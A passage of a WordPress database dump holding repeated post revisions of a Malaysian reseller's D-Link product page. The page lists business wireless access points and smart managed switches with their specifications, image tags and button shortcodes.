370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:37:23','2019-09-25 04:37:23','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3371,1,'2019-09-25 12:39:08','2019-09-25 04:39:08','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:39:08','2019-09-25 04:39:08','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3372,1,'2019-09-25 12:39:34','2019-09-25 04:39:34','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet 